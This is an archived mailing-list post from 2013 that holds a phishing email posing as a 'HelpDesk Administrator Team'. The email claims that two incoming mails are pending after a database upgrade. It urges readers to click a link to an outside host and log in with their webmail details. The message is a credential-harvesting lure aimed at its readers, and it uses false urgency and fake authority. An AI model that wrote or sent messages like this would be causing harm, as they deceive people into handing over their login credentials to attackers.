* Helpdesk Mail Box Warning!!!
@ 2013-09-10 23:11 Barkman, Maria
From: Barkman, Maria @ 2013-09-10 23:11 UTC (permalink / raw)

Your two incoming mails were placed on pending status due to the recent upgrade in our data base,

In order to receive the messages kindly click HERE<http://c3-clerifynod.scienceontheweb.net/upgrade.php>

Login with your correct Webmail information's and wait for responds from our data base service.
We apologize for any inconvenience and do appreciate your understanding.

Regards,
HelpDesk Administrator Team.

* Helpdesk Mail Box Warning!!!
@ 2013-09-10 23:23 Barkman, Maria